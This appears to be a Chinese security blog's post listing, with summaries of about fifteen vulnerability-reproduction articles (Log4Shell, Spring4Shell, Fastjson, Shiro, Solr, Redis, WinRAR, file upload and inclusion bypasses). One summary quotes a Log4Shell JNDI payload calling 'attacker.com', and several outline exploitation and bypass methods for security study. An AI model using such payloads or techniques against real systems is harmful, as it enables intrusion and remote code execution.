自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 Spring4Shell CVE-2022-22965原理及复现

Spring4Shell(CVE-2022-22965)是Spring Framework的远程代码执行漏洞,通过参数绑定机制利用JDK 9+的module属性访问classLoader,修改Tomcat的AccessLogValve配置写入恶意JSP文件实现RCE,需满足JDK版本、框架版本、部署方式等多个条件。

2026-01-08 18:54:25 619

原创 Apache Solr RCE漏洞复现

Apache Solr是一个基于Lucene的开源搜索平台,用于构建高性能搜索应用。本文分析了两个Solr高危漏洞:CVE-2017-12629允许通过RunExecutableListener执行系统命令(影响版本<7.1),复现过程包括添加恶意监听器并触发反弹shell;CVE-2019-0193通过VelocityResponseWriter插件配置不当实现RCE(影响版本5.x-8.2.0),演示了如何修改配置参数并执行whoami命令。两个漏洞均需要特定配置条件

2026-01-01 18:06:48 1557

原创 MongoDB漏洞复现(CVE-2025-14847)

摘要:CVE-2025-14847(MongoBleed)高危漏洞分析 MongoDB服务器存在高危内存泄露漏洞(CVSS 8.7),攻击者通过发送畸形zlib压缩包可远程提取未初始化堆内存数据,包括凭证、会话令牌等敏感信息。漏洞影响2017年以来启用zlib压缩的4.4.x至8.2.2版本,约8.7万+互联网暴露实例受影响。复现显示,漏洞版本(如6.0.14)会返回内存数据,而修复版本(如6.0.27)无此问题。

2025-12-31 21:26:28 1615

原创 apache_shiro (CVE-2016-4437)反序列化漏洞复现

Apache Shiro 1.2.4及之前版本存在反序列化漏洞(CVE-2016-4437),由于默认使用硬编码AES密钥,攻击者可利用RememberMe功能构造恶意序列化数据实现RCE。漏洞复现包括手工检测密钥、生成payload和工具自动化利用两种方式。防御建议升级至1.8.0+版本、配置强密钥或禁用RememberMe功能。本文仅供授权测试和教育研究使用,严禁非法利用。

2025-12-31 21:19:39 575

原创 Fastjson反序列化漏洞(1.2.24版本)

摘要:Fastjson 1.2.24及以下版本存在反序列化漏洞,由于默认开启autotype功能,攻击者可构造恶意JSON触发JNDI注入实现RCE。漏洞复现显示,通过JdbcRowSetImpl类可连接恶意RMI服务执行任意命令。防御措施包括升级至1.2.83+版本、关闭autotype、配置白名单及设置JVM安全参数。该漏洞涉及多个版本绕过黑名单的变种,需及时更新防护。

2025-12-29 21:41:19 1010

原创 Log4j2-CVE-2021-44228漏洞复现

摘要: CVE-2021-44228(Log4Shell)是Apache Log4j2(2.0.0-2.14.1)中的严重JNDI注入漏洞(CVSS 10.0),允许通过恶意日志消息(如${jndi:ldap://attacker.com/exp})触发远程代码执行。漏洞原理是Log4j2动态解析JNDI表达式时,会连接攻击者控制的LDAP/RMI服务器加载恶意类。复现可通过vulhub靶场插入DNSLog或Java-Chains生成的Payload验证。

2025-12-29 21:32:49 1257

原创 CVE-2025-49844 Redis Lua 引擎 Use-After-Free 漏洞复现笔记

Redis Lua引擎存在高危漏洞CVE-2025-49844(RediShell),影响6.x至8.2.x多个版本,可通过特殊Lua脚本导致远程代码执行。复现测试在redis:8.2.1-alpine镜像成功,利用公开PoC可实现反弹shell和命令执行。建议立即升级至修复版本或采取禁用高危命令、启用认证等缓解措施。该漏洞需认证但风险极高(CVSS 10.0),所有启用Lua的Redis实例均默认受影响。

2025-12-25 18:59:08 1286

原创 CVE-2025-8088:WinRAR <=7.12 目录穿越漏洞的复现步骤、PoC 使用与应急防护建议

WinRAR 7.12及以下版本存在目录穿越漏洞(CVE-2025-8088),攻击者可构造恶意RAR文件诱骗用户解压,将恶意文件释放到任意路径(如开机启动目录),实现持久化攻击。该漏洞利用NTFS特性隐蔽性高,仅需用户解压即可触发。WinRAR已于2025年7月30日发布7.13修复版本。防护建议:立即升级WinRAR、限制NTFS ADS功能、谨慎处理来源不明的压缩包、监控关键目录。实验复现需在隔离环境中进行,切勿用于非法用途。

2025-12-11 21:57:53 1099

原创 RCE:LD_PRELOAD 绕过:原理与实战

LD_PRELOAD, 绕过, 提权本文所有内容仅供安全学习、研究和防御目的,严禁用于任何非法或未经授权的活动,否则后果自负。

2025-12-09 01:35:55 848

原创 RCE:代码执行/命令执行/绕过技巧

RCE, 绕过, 异或, 无回显本文所有内容仅供安全学习、研究和防御目的,严禁用于任何非法或未经授权的活动,否则后果自负。

2025-12-09 01:35:02 806

原创 CSRF 防护实践:检测、绕过与防御

CSRF 是一个经典但仍常见的 Web 安全漏洞,其防护必须依赖于来源校验 (OriginRefererToken 校验和Cookie 策略 (SameSite的多重组合。切记不要将Referer当作唯一的防线。定期进行渗透测试,并监控 Token 校验失败日志,有助于及时发现和修复安全隐患。免责声明本文内容,包括但不限于技术分析、攻击示例和绕过技巧,仅为网络安全学习、研究和防御目的而提供。读者应严格遵守所有适用法律法规和道德规范。严禁将本文中的任何信息用于未经授权的测试、攻击、破坏或其他非法活动。

2025-12-07 23:23:37 1002

原创 文件包含漏洞:原理、分类、利用与修复

文件包含漏洞是程序开发中常见的代码复用技术被滥用的结果。本文详细分析了文件包含漏洞的原理、分类(LFI本地文件包含和RFI远程文件包含)、发现方法(白盒审计和黑盒分析)及利用思路。重点介绍了PHP伪协议(如php://input、php://filter)的利用方式,以及日志文件包含、路径绕过等技巧。文章还提供了CTF实战示例和防御措施,强调应禁用远程文件包含、采用白名单验证和路径限制等安全策略。

2025-12-07 23:22:15 792

原创 文件与目录安全:下载、删除、遍历与穿越

摘要: 本文探讨文件与目录安全风险,包括文件下载/删除漏洞和目录遍历/穿越攻击。攻击者可能通过修改参数访问敏感文件(如/etc/passwd)或删除关键数据。文章列举了Windows/Linux常见敏感文件路径,并分析多种绕过技术(URL编码、空字节截断等)。重点指出主机凭证文件(SSH私钥、shadow文件)和应用配置(web.xml、nginx.conf)的高风险性。防御建议包括最小权限原则、路径校验、白名单机制等。

2025-12-06 22:40:39 833

原创 文件上传漏洞:解析、存储与安全最佳实践

本文系统总结了文件上传漏洞的检测与绕过技术,涵盖12种典型攻击手法:前端JS校验绕过、配置文件利用、MIME伪造、文件头检测绕过、黑名单缺陷、大小写混淆、NULL字节截断、Fuzzing测试、条件竞争攻击、二次渲染绕过、函数缺陷利用和数组字段绕过。针对每种技术提供了具体示例和防御建议,强调后端白名单校验、内容检测、隔离存储等核心防护措施。文章包含完整的HTTP请求示例,适用于PHP环境但多数方法可迁移到其他语言,旨在帮助开发者和安全人员理解漏洞原理并实施有效防护。

2025-12-06 22:38:43 1070

原创 CVE-2025-55182的复现与修复

React Server Components漏洞(CVE-2025-55182)摘要: 该漏洞允许未认证攻击者通过精心构造的请求实现远程代码执行(RCE),主要利用三种技术路径:1)直接通过vm/child_process模块执行代码;2)通过fs模块写入恶意文件间接执行;3)利用原型链污染恢复危险原语。影响React Server Components核心包(19.0-19.2.0版本)及Next.js 15.0.0-15.0.4。修复建议包括升级至Next.js≥15.0.5或手动更新react-se

2025-12-04 17:56:50 3542 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除